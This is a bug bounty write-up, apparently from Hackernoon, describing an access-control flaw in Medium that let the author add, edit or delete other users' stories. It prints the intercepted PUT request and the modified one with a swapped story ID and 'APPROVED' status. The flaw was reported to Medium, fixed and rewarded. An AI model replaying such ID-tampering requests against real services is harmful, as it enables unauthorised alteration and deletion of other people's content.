![](https://hackernoon.com/hn-images/1*8p8QaX1bOx9T5tu9EzkGnA.png)

Before the end of this year, Two well-known people was hacked. Mark Zuckerberg (CEO) of [Facebook](https://hackernoon.com/tagged/facebook) and Sundar Pichai (CEO) of Google and I was thinking what if it’s time for me to hack [Barack Obama](https://medium.com/@PresidentObama). But, I know that isn’t easy.

So, I decided to use my big brain to think my way out!  
Looking for a new angle… Then, I found the “Request Story” button hiding in the ‘ellipsis’ or ‘more’ icon.

![](https://hackernoon.com/hn-images/1*BLoDOimxZDZ-BKv2qEBJ5w.png)

But, there’s a problem. They, need to approve my request to add their story into my publication and that’s absolutely impossible. But apparently, I can add my own story into my publication without further ado.

![](https://hackernoon.com/hn-images/1*tIc8Hog89xYlanRgoHUtQg.png)

First step of adding a story to publication.

![](https://hackernoon.com/hn-images/1*DkGnOC1OS-CwgTuS9Bobng.png)

Second and Last step is to choose a publication where you want to add the story.

My goal here is to add any story of another user into my publication without their consent and I did that using the “Add story to publication” button.

While I’m adding my own story to my publication, I intercepted the HTTP Request to modify the story ID.

My Story ID: 2a4b6810c12d  
Story ID of the target: 1a3b579c101a

#### The HTTP Request:

PUT /testphzxc/**2a4b6810c12d** HTTP/1.1  
Host: medium.com  
Connection: keep-alive  
Content-Length: 25  
Accept: application/json  
Origin: [https://medium.com](https://medium.com)  
X-XSRF-Token: {Redacted}  
X-Obvious-CID: web  
User-Agent: {Redacted}  
Content-Type: application/json  
Referer: {Redacted}  
Accept-Encoding: gzip, deflate, sdch, br  
Accept-Language: en-US,en;q=0.8,nb;q=0.6  
Cookie: {Redacted}

{“postStatus”:”APPROVED”}

In the line where the PUT method is located, you will see the ID of my story. And I will remove that ID and put the ID of the target’s story.

#### Updated HTTP Request:

PUT /testphzxc/**_1a3b579c101a_** HTTP/1.1  
Host: medium.com  
Connection: keep-alive  
Content-Length: 25  
Accept: application/json  
Origin: [https://medium.com](https://medium.com)  
X-XSRF-Token: {Redacted}  
X-Obvious-CID: web  
User-Agent: {Redacted}  
Content-Type: application/json  
Referer: {Redacted}  
Accept-Encoding: gzip, deflate, sdch, br  
Accept-Language: en-US,en;q=0.8,nb;q=0.6  
Cookie: {Redacted}

**{“postStatus”:”APPROVED”}**

Of course, like what I’ve just mentioned above, the story will automatically added to my publication without their consent. That is because of:

**{“postStatus”:”APPROVED”}** 

Then \*Poof\*. The Target’s story was added to my publication.

Now What? Because the story was added to my publication, I am now able to edit his/her story or delete it.

Well, instead of attacking Mr. Obama’s blog, I reported it to [Medium](https://hackernoon.com/tagged/medium).   
They fixed it and rewarded me with a $250 bounty but I want more because I found multiple bugs in my report. First, Bypass the Request Story and Two, Update and Delete any story. Then, they added the previous bounty with a $100 bounty for a total of $350 bounty.

Facebook

Google

Target

Too Long; Didn't Read

Cassandra Forward a free Cassandra-focused community event

Update and Delete any Story of any user on Medium

Too Long; Didn't Read

Companies Mentioned

@ajdumanhug

RELATED STORIES